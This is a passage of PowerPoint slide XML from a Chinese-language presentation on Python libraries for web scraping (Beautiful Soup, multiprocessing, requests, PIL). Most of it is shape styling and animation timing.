              <a:gs pos="100000">
                <a:srgbClr val="BFBFBF">
                  <a:alpha val="80000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect t="100000" r="100000"/>
            </a:path>
            <a:tileRect l="-100000" b="-100000"/>
          </a:gradFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="571500" dist="508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prstClr val="white"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="矩形 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3592956" y="2959978"/>
            <a:ext cx="1529586" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:innerShdw blurRad="63500" dist="50800" dir="16200000">
                    <a:prstClr val="black">
                      <a:alpha val="30000"/>
                    </a:prstClr>
                  </a:innerShdw>
                </a:effectLst>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Part </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:innerShdw blurRad="63500" dist="50800" dir="16200000">
                    <a:prstClr val="black">
                      <a:alpha val="30000"/>
                    </a:prstClr>
                  </a:innerShdw>
                </a:effectLst>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>04</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst>
                <a:innerShdw blurRad="63500" dist="50800" dir="16200000">
                  <a:prstClr val="black">
                    <a:alpha val="30000"/>
                  </a:prstClr>
                </a:innerShdw>
              </a:effectLst>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22" name="直接连接符 21"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4778443" y="3499305"/>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9"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out)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>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10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250"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="14"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="14" presetID="35" presetClass="path" presetSubtype="0" decel="40000" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -0.02761 -1.48148E-6 L 0.20768 -1.48148E-6 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="750" spd="-100000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="14"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="11758" y="0"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="16" presetID="35" presetClass="path" presetSubtype="0" accel="40000" decel="40000" fill="hold" grpId="2" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="750"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -0.028 -1.48148E-6 L 2.91667E-6 -1.48148E-6 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="750" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="14"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="1393" y="0"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="18" presetID="31" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="250"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.rotation</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="90"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>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3" grpId="0" animBg="1"/>
      <p:bldP spid="14" grpId="0" animBg="1"/>
      <p:bldP spid="14" grpId="1" animBg="1"/>
      <p:bldP spid="14" grpId="2" animBg="1"/>
      <p:bldP spid="2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52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1067052" y="330463"/>
            <a:ext cx="3100387" cy="701040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000"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补坑</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000"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59" name="椭圆 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1513373" y="1411077"/>
            <a:ext cx="205838" cy="205838"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="50000">
                <a:schemeClr val="bg1">
                  <a:alpha val="80000"/>
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="0">
                <a:schemeClr val="bg1">
                  <a:lumMod val="100000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="BFBFBF">
                  <a:alpha val="70000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect t="100000" r="100000"/>
            </a:path>
            <a:tileRect l="-100000" b="-100000"/>
          </a:gradFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="571500" dist="508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algn="ctr"/>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="9600">
              <a:solidFill>
                <a:srgbClr val="41AAD5"/>
              </a:solidFill>
              <a:effectLst>
                <a:innerShdw blurRad="63500" dist="50800" dir="16200000">
                  <a:prstClr val="black">
                    <a:alpha val="30000"/>
                  </a:prstClr>
                </a:innerShdw>
              </a:effectLst>
              <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="华文细黑" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="矩形 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1976120" y="1634490"/>
            <a:ext cx="8563610" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"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Beautiful Soup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"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：已经被移植到BS4，最主要的功能是从网页抓取数据。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"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62" name="椭圆 61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1513373" y="2339035"/>
            <a:ext cx="205838" cy="205838"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="50000">
                <a:schemeClr val="bg1">
                  <a:alpha val="80000"/>
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="0">
                <a:schemeClr val="bg1">
                  <a:lumMod val="100000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="BFBFBF">
                  <a:alpha val="70000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect t="100000" r="100000"/>
            </a:path>
            <a:tileRect l="-100000" b="-100000"/>
          </a:gradFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="571500" dist="508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algn="ctr"/>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="9600">
              <a:solidFill>
                <a:srgbClr val="41AAD5"/>
              </a:solidFill>
              <a:effectLst>
                <a:innerShdw blurRad="63500" dist="50800" dir="16200000">
                  <a:prstClr val="black">
                    <a:alpha val="30000"/>
                  </a:prstClr>
                </a:innerShdw>
              </a:effectLst>
              <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="华文细黑" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="矩形 63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1976120" y="2261870"/>
            <a:ext cx="8563610" cy="1554480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"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multiprocessing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"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Python中的多进程管理包。与threading.Thread类似，它可以利用multiprocessing.Process对象来创建一个进程。multiprocessing的很大一部份与threading使用同一套API，只不过换到了多进程的情境。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000"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65" name="椭圆 64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1513189" y="3816457"/>
            <a:ext cx="205838" cy="205838"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="50000">
                <a:schemeClr val="bg1">
                  <a:alpha val="80000"/>
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="0">
                <a:schemeClr val="bg1">
                  <a:lumMod val="100000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="BFBFBF">
                  <a:alpha val="70000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect t="100000" r="100000"/>
            </a:path>
            <a:tileRect l="-100000" b="-100000"/>
          </a:gradFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="571500" dist="508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algn="ctr"/>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="9600">
              <a:solidFill>
                <a:srgbClr val="41AAD5"/>
              </a:solidFill>
              <a:effectLst>
                <a:innerShdw blurRad="63500" dist="50800" dir="16200000">
                  <a:prstClr val="black">
                    <a:alpha val="30000"/>
                  </a:prstClr>
                </a:innerShdw>
              </a:effectLst>
              <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="华文细黑" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93" name="矩形 92"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1975485" y="3816350"/>
            <a:ext cx="8564245" cy="420370"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"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requests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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：与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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HTTP/1.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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请求操作有关的一个库。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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97" name="椭圆 96"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1436517" y="1334220"/>
            <a:ext cx="359551" cy="359551"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:prstDash val="lg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a:solidFill>
                <a:schemeClr val="tx1"/>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98" name="椭圆 97"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1436517" y="2262178"/>
            <a:ext cx="359551" cy="359551"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:prstDash val="lg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a:solidFill>
                <a:schemeClr val="tx1"/>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99" name="椭圆 98"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1436333" y="3739600"/>
            <a:ext cx="359551" cy="359551"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:prstDash val="lg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a:solidFill>
                <a:schemeClr val="tx1"/>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椭圆 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1513189" y="4741017"/>
            <a:ext cx="205838" cy="205838"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="50000">
                <a:schemeClr val="bg1">
                  <a:alpha val="80000"/>
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="0">
                <a:schemeClr val="bg1">
                  <a:lumMod val="100000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="BFBFBF">
                  <a:alpha val="70000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect t="100000" r="100000"/>
            </a:path>
            <a:tileRect l="-100000" b="-100000"/>
          </a:gradFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="571500" dist="508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p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="9600">
              <a:solidFill>
                <a:srgbClr val="41AAD5"/>
              </a:solidFill>
              <a:effectLst>
                <a:innerShdw blurRad="63500" dist="50800" dir="16200000">
                  <a:prstClr val="black">
                    <a:alpha val="30000"/>
                  </a:prstClr>
                </a:innerShdw>
              </a:effectLst>
              <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="华文细黑" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="椭圆 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1436333" y="4664160"/>
            <a:ext cx="359551" cy="359551"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:prstDash val="lg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noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx1"/>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4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1976120" y="4740910"/>
            <a:ext cx="8564245" cy="420370"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"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requests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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a:t>
            </a:r>
            <a:r>
              <a:rPr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Python Imaging Library，已经是Python平台事实上的图像处理标准库</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN"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a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN"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9"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75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750"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="53"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="8" presetID="21" presetClass="entr" presetSubtype="1" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="2250"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="97"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wheel(1)">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="750"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="97"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="11" presetID="21" presetClass="entr" presetSubtype="1" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="2250"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="98"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wheel(1)">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="750"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="98"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="14" presetID="21" presetClass="entr" presetSubtype="1" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="2250"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="99"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wheel(1)">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="750"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="99"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="17" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="2250"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="59"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="750" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="59"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="750" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="59"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="750"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="59"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="22" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="2250"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="62"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="750" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="62"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="750" fill="hold"/>
                                        <p:tgtEl>
